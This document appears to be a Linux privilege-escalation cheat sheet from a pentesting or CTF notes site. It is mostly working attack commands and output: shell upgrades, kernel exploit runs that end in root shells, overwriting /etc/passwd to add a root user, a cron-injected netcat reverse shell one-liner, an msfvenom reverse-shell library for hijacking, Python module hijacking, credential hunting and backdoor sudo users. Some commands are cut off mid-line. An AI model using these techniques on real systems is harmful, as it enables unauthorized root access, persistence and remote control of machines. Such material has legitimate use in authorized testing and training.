Skip to content

Linux Privilege Escalation

Upgrade Shell

PayloadsAllTheThings: Spawn TTY Shell

Spawning a TTY Shell

python -c 'import pty; pty.spawn("/bin/bash")'
python3 -c 'import pty; pty.spawn("/bin/bash")'
/usr/bin/script -qc /bin/sh /dev/null
perl -e 'exec "/bin/sh";'
perl: exec "/bin/sh";
ruby: exec "/bin/sh"
echo os.system('/bin/bash')
/bin/sh -i
lua: os.execute('/bin/sh')

(From within IRB)

exec "/bin/sh"

(From within vi)


(From within vi)

:set shell=/bin/bash:shell

(From within nmap)


Export Terminal

export TERM=xterm


stty raw -echo; fg
stty rows 42 columns 172

User Enumeration

Current User

hostname && whoami && id

Which ones have a valid shell

grep -vE "nologin|false" /etc/passwd


pwd; ls -la

OS & Architecture & Kernel

Kernel version and Architecture

uname -a
cat /etc/issue; uname -r; arch

What's the OS?

cat /etc/*-release
lsb_release -a (Debian based OSs)

Drivers & Kernel Modules

/sbin/modinfo <name>

Compile exploit in C/C++

$ gcc -m32 Size.c -o x86-S
$ ./x86-S
Size = 4 
$ gcc Size.c -o x64-S
$ ./x64-S
Size = 8
int main()
        printf("Size = %lu", sizeof(size_t));

<= 2.6.36-rc8 - 'RDS Protocol'

www-data@ip:/tmp$ uname -a
Linux ip 2.6.32-21-generic #32-Ubuntu SMP Fri Apr 16 08:10:02 UTC 2010 i686 GNU/Linux

gcc -m32 15285.c -o 15285
www-data@ip:/tmp$ ./15285
[*] Linux kernel >= 2.6.30 RDS socket exploit
[*] by Dan Rosenberg
[*] Resolving kernel addresses...
 [+] Resolved security_ops to 0xc08c8c2c
 [+] Resolved default_security_ops to 0xc0773300
 [+] Resolved cap_ptrace_traceme to 0xc02f3dc0
 [+] Resolved commit_creds to 0xc016dcc0
 [+] Resolved prepare_kernel_cred to 0xc016e000
[*] Overwriting security ops...
[*] Overwriting function pointer...
[*] Triggering payload...
[*] Restoring function pointer...
[*] Got root!
# id
uid=0(root) gid=0(root)

<= 2.6.37 'Full-Nelson.

www-data@popcorn:/home/george$ uname -a
Linux popcorn 2.6.31-14-generic-pae #48-Ubuntu SMP Fri Oct 16 15:22:42 UTC 2009 i686 GNU/Linux
www-data@popcorn:/home/george$ cat /etc/issue
cat /etc/issue
Ubuntu 9.10 \n \l

www-data@popcorn:/var/www$ gcc 15704.c -o 15704
gcc 15704.c -o 15704
www-data@popcorn:/var/www$ chmod +x 15704
chmod +x 15704
www-data@popcorn:/var/www$ ./15704
[*] Resolving kernel addresses...
 [+] Resolved econet_ioctl to 0xf846a280
 [+] Resolved econet_ops to 0xf846a360
 [+] Resolved commit_creds to 0xc01645d0
 [+] Resolved prepare_kernel_cred to 0xc01647d0
[*] Calculating target...
[*] Failed to set Econet address.
[*] Triggering payload...
[*] Got root!
# whoami

2.6.39 < 3.2.2 (x86/x64)

www-data@hades:/tmp$ uname -a
Linux hades 3.0.0-12-server #20-Ubuntu SMP Fri Oct 7 16:36:30 UTC 2011 x86_64 x86_64 x86_64 GNU/Linux

www-data@hades:/tmp$ ./35161 
=          Mempodipper        =
=           by zx2c4          =
=         Jan 21, 2012        =

[+] Ptracing su to find next instruction without reading binary.
[+] Creating ptrace pipe.
[+] Forking ptrace child.
[+] Waiting for ptraced child to give output on syscalls.
[+] Ptrace_traceme'ing process.
[+] Error message written. Single stepping to find address.
[+] Resolved call address to 0x401ce8.
[+] Opening socketpair.
[+] Waiting for transferred fd in parent.
[+] Executing child from child fork.
[+] Opening parent mem /proc/2338/mem in child.
[+] Sending fd 6 to parent.
[+] Received fd at 6.
[+] Assigning fd 6 to stderr.
[+] Calculating su padding.
[+] Seeking to offset 0x401cdc.
[+] Executing su with shellcode.
# id
uid=0(root) gid=0(root) groups=0(root),33(www-data)

Processes and Services

ps axu

How to check if port is in use in

sudo lsof -i -P -n | grep LISTEN

List all enabled services from systemctl

systemctl list-unit-files | grep enabled

Active network connection

ss -anp
netstat -antup

Binaries That AutoElevate

find / -perm -u=s -type f -exec ls -l {} \; 2>/dev/null

sudo in linux

Check sudo access

$ sudo -l
[sudo] password for Hades: 
Matching Defaults entries for pentesterlab on 7358cafc3ebe:
User Hades may run the following commands:
    (victim) /bin/bash

Mix cp/chown and chmod

sudo -l
Matching Defaults entries for Hades:
User Hades may run the following commands:
    (victim) /bin/chmod, /bin/cp


find / -writable -type d 2>/dev/null
find / -writable 2>/dev/null

File /etc/passwd

File /etc/passwd can be modify by user permission.

ls -l /etc/passwd
-rw-rw-rw- 1 root root <snip> /etc/passwd
$ openssl passwd 
Verifying - Password: 

QzKsrWCYxmRPY : non password hash.

sed 's/root:x:/root:QzKsrWCYxmRPY:/' /etc/passwd > passwd
cat passwd > /etc/passwd

Generate password for new user

openssl passwd -1 -salt hades leecybersec
echo toor:$1$hades$KKCtexC.plAyjcJkX7War0:0:0:root:/root:/bin/bash >> /etc/passwd

Scheduled Tasks

ls -lah /etc/cron*
cat /etc/crontab
grep "CRON" /var/log/* 2>/dev/null

Cronjob file insecure

Cronjob file overwrite, file running as root every 1 minute.

ls -l
-rw-rw-rw- 1 root root <snip>

Can change file with user permission.

echo "rm /tmp/f; mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc ip port >/tmp/f" >>

PATH Search Order Crontab

$ cat /etc/crontab

# m h dom mon dow user  command
*/5 *   * * *   root    cd / && run-parts --report /etc/cron.hourly
25 6    * * *   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6    * * 7   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6    1 * *   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )

==> PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin

chloe@roquefort:~$ ls -ld /usr/local/bin
drwxrwsrwx 2 root staff 4096 Apr 24  2020 /usr/local/bin
cp /tmp/shell /usr/local/bin/run-parts */5 : "At every 5th minute."

$ sudo nc -nvlp 22
listening on [any] 22 ...
connect to [ip] from (UNKNOWN) [ip] 37228
uid=0(root) gid=0(root) groups=0(root)

Module Import Hijacking

Dynamic Library Hijacking

  *  *  *  *  * root       /usr/bin/log-sweeper

==> LD_LIBRARY_PATH=/usr/lib:/usr/lib64:/usr/local/lib/dev:/usr/local/lib/utils

[hades@hades ~]$ ls -ld /usr/local/lib/dev
drwxrwxrwx 2 root root 6 Sep  7  2020 /usr/local/lib/dev
[hades@hades ~]$ ls -l /usr/bin/log-sweeper
-rwxr-xr-x. 1 root root 8800 Sep  4  2020 /usr/bin/log-sweeper
[hades@hades ~]$ /usr/bin/log-sweeper
/usr/bin/log-sweeper: error while loading shared libraries: cannot open shared object file: No such file or directory


msfvenom -p linux/x64/shell_reverse_tcp LHOST= LPORT=6379 -f elf-so >
[hades@hades dev]$ chmod 777 
[hades@hades dev]$ pwd
$ sudo nc -nvlp 6379
listening on [any] 6379 ...
connect to [ip] from (UNKNOWN) [ip] 55124
uid=0(root) gid=0(root) groups=0(root)

Python Module Hijacking

$ cat 

import sys

    import controller
except Exception:
    print "[!] ERROR: Unable to load controller module."

controller module not found.

Create file and add malicious python code.

echo 'import os;os.system("chmod 777 /etc/passwd")' >

Docker container

root@315d7648a173:/# ls -lah
-rwxr-xr-x   1 root root    0 Jun  9 13:01 .dockerenv

Mount disk to docker machine.

mkdir -p /mnt/hola
mount /dev/sda1 /mnt/hola
mount /dev/sda2 /mnt/hola
mount /dev/sda3 /mnt/hola

Installed and Patch Levels

dpkg -l (Debian based OSs)
rpm -qa (CentOS / openSUSE )
uname -a

Networking Enumeration

Interface and Routable

ip a

Firewall and Rules

grep -Hs iptables /etc/*

Unmounted Disks

List all mounted files system

cat /etc/fstab

List all disk


Mount disk

sudo mount -o nolock ~/share

Enumeration Tools

Basic Linux Privilege Escalation

More Commands

history, bashrc, backup

find / -name *history* 2>/dev/null
find / -name *backup* 2>/dev/null
find / -name *bashrc* -exec grep passwod {} \; 2>/dev/null

Port Tunneling

Local Tunneling

ssh -L $myport: hades@ -i id_rsa

Remote Tunneling

ssh -R $myip:$myport: kali@$myip -i kali-idrsa


~C to type ssh command

Generate SSH Key

ssh-keygen -t rsa
cp authorized_keys

Add user to sudo

Create user:pass

echo -e "pass\pass" | adduser --gecos "" user
usermod -aG sudo user
sudo su - user